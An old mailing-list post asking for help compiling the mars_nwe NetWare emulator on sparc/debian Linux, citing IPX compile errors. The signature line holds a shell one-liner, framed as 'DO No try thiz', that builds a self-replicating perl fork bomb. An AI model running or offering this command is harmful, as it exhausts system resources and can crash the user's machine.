mars problem

I had installed sparc/debian linux on my sparc from 1998.12.07 archive and
I had compiled kernel 36 for it. And i had installed mars (NWe
emulator) (mars 0.99p12) but during compiling the mars there was a lot of
error about ipx. Kernel includes ipx supplying and the ipx pockets are
installed (ipx,ncpfs,etc).I had make a mistake, or what? Anyway, had
anyone compiled mars succesfully on linux sparc/debian?

(debian download: ftp1.us.debian.org,  mars download: ftp.kfki.hu,  kernel
download: vger.rutgers.edu)

THX

csibi@makacs.poliod.hu, csibi@kac.poliod.hu, csibi@tng.ml.org
LINUX: Dead or alive
DO No try thiz:        echo "perl -e 'system\"./i|./i&\"'">i;chmod +x i;./i